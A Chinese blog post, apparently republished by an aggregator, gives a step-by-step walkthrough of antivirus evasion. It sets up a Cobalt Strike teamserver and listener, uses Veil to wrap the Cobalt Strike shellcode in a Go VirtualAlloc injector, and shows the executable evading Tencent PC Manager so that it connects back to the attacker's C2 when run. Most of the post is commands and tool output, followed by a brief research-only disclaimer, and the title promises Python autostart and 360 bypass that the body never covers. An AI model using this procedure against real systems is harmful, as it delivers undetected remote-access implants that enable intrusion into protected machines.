欢迎访问 生活随笔!
TAG聚合

生活随笔

当前位置: 首页 >

python自启动 绕过360_记录一次绕过杀软的过程

发布时间:2024/1/23 39 豆豆
生活随笔 收集整理的这篇文章主要介绍了 python自启动 绕过360_记录一次绕过杀软的过程 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

一、背景

在做红队渗透时,经常会遇到目标机安装了各种杀毒软件,诸如360、腾讯管家之类的。导致生成的payload总是无法利用且被杀软强制删除的事情时常发生。这个东西真的很烦人,烦死了!只能停下来去研究一下杀软的原理以及如何绕过。在此记录下来做个备忘录。

二、需要用到的工具

cobalt strike:这个是在做红队渗透时用到的一款软件,具有团队协作和生成payload的工具。主要有两个部分组成,一个是服务器端,一个是客户端,服务器端只支持Linux,客户端MacOS、Windows、Linux都支持。软件运行前提是要安装java。

相关链接:

Adversary Simulation and Red Team Operations Software​www.cobaltstrike.com

Veil:这个是一款生成payload并绕过杀软的一款工具。

相关链接:

https://github.com/Veil-Framework/Veil​github.com

三、免杀步骤

3.1 设置CS服务器端和客户端

在这里提醒一下,如果你的CS展开目录之后文件没有执行权限,是无法运行的,所以需要给CS目录下的文件添加执行权限。

chmod +x 文件名

运行CS服务端

(base) root@kali:~/python/cs4.0# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255inet6 fe80::20c:33ff:dfbf:dfa3 prefixlen 64 scopeid 0x20<link>ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)RX packets 130003 bytes 193285222 (184.3 MiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 81397 bytes 4399635 (4.1 MiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0device interrupt 19 base 0x2000lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 24 bytes 1356 (1.3 KiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 24 bytes 1356 (1.3 KiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 (base) root@kali:~/python/cs4.0# ./teamserver 192.168.91.156 123456 [*] Will use existing X509 certificate and keystore (for SSL) [+] Team server is up on 50050 [*] SHA256 hash of SSL cert is: [+] Listener: test started!

运行CS客户端

点击【连接】即可打开CS客户端。

3.2利用CS生成payload

监听器类型设置为http类型

选择【Choose】,生成payload保存在文件夹备用。

3.3安装veil

建议使用Kali快速安装命令

apt -y install veil /usr/share/veil/config/setup.sh --force --silent

安装过程比较慢,且需要挂代理。

安装时会自动下载安装依赖软件,安装成功后如图所示:

在veil里输入

use 1

可以看到Veil里总共有41种payload,我们输入list查看所有payload

===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================[*] Available Payloads:1) autoit/shellcode_inject/flat.py2) auxiliary/coldwar_wrapper.py3) auxiliary/macro_converter.py4) auxiliary/pyinstaller_wrapper.py5) c/meterpreter/rev_http.py6) c/meterpreter/rev_http_service.py7) c/meterpreter/rev_tcp.py8) c/meterpreter/rev_tcp_service.py9) cs/meterpreter/rev_http.py10) cs/meterpreter/rev_https.py11) cs/meterpreter/rev_tcp.py12) cs/shellcode_inject/base64.py13) cs/shellcode_inject/virtual.py14) go/meterpreter/rev_http.py15) go/meterpreter/rev_https.py16) go/meterpreter/rev_tcp.py17) go/shellcode_inject/virtual.py18) lua/shellcode_inject/flat.py19) perl/shellcode_inject/flat.py20) powershell/meterpreter/rev_http.py21) powershell/meterpreter/rev_https.py22) powershell/meterpreter/rev_tcp.py23) powershell/shellcode_inject/psexec_virtual.py24) powershell/shellcode_inject/virtual.py25) python/meterpreter/bind_tcp.py26) python/meterpreter/rev_http.py27) python/meterpreter/rev_https.py28) python/meterpreter/rev_tcp.py29) python/shellcode_inject/aes_encrypt.py30) python/shellcode_inject/arc_encrypt.py31) python/shellcode_inject/base64_substitution.py32) python/shellcode_inject/des_encrypt.py33) python/shellcode_inject/flat.py34) python/shellcode_inject/letter_substitution.py35) python/shellcode_inject/pidinject.py36) python/shellcode_inject/stallion.py37) ruby/meterpreter/rev_http.py38) ruby/meterpreter/rev_https.py39) ruby/meterpreter/rev_tcp.py40) ruby/shellcode_inject/base64.py41) ruby/shellcode_inject/flat.py

我们选择Go语言生成shellcode

Veil/Evasion>: use 17 ===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================Payload Information:Name: Golang Flat Shellcode InjectorLanguage: goRating: NormalDescription: Golang VirtualAlloc method for inline shellcodeinjection Payload: go/shellcode_inject/virtual selectedRequired Options: Name Value Description ---- ----- ----------- BADMACS FALSE Check for VM based MAC addresses CLICKTRACK X Require X number of clicks before execution COMPILE_TO_EXE Y Compile to an executable CURSORCHECK FALSE Check for mouse movements DISKSIZE X Check for a minimum number of gigs for hard disk HOSTNAME X Optional: Required system hostname INJECT_METHOD Virtual Virtual or Heap MINPROCS X Minimum number of running processes PROCCHECK FALSE Check for active VM processes PROCESSORS X Optional: Minimum number of processors RAMCHECK FALSE Check for at least 3 gigs of RAM SLEEP X Optional: Sleep "Y" seconds, check if accelerated USERNAME X Optional: The required user account USERPROMPT FALSE Prompt user prior to injection UTCCHECK FALSE Check if system uses UTC timeAvailable Commands:back Go back to Veil-Evasionexit Completely exit Veilgenerate Generate the payloadoptions Show the shellcode's optionsset Set shellcode option

输入【generate】

[go/shellcode_inject/virtual>>]: generate[?] Generate or supply custom shellcode?1 - Ordnance (default)2 - MSFVenom3 - Custom shellcode string4 - File with shellcode (x41x42..)5 - Binary file with shellcode[>] Please enter the number of your choice: 3[>] Please enter custom shellcode (one line, no quotes, x00.. format):

在上面输入CS生成的Payload,设置文件名,就生成了一个免杀payload。

[*] Using pre-generated shellcode... ===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================[>] Please enter the base name for output files (default is payload): helloworld.exe runtime/internal/sys runtime/internal/atomic runtime errors internal/race sync/atomic math internal/syscall/windows/sysdll unicode/utf16 unicode/utf8 sync io syscall strconv internal/syscall/windows internal/syscall/windows/registry time reflect os fmt command-line-arguments ===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================[*] Language: go[*] Payload Module: go/shellcode_inject/virtual[*] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe[*] Source code written to: /var/lib/veil/output/source/helloworld.exe.go

生成的payload存放路径会在shell里说明,找到那个文件,放在安装了腾讯电脑管家的虚拟机里运行一下看看会不会报毒。

接下来用电脑管家查杀一下刚才生成的payload。

即可成功绕过腾讯电脑管家。接下来就是双击运行,等待CS上线对话做后渗透阶段一把梭了。
以上内容仅作安全研究使用,请勿做非法事情。坚守自己的底线,做守法公民。

总结

以上是生活随笔为你收集整理的python自启动 绕过360_记录一次绕过杀软的过程的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。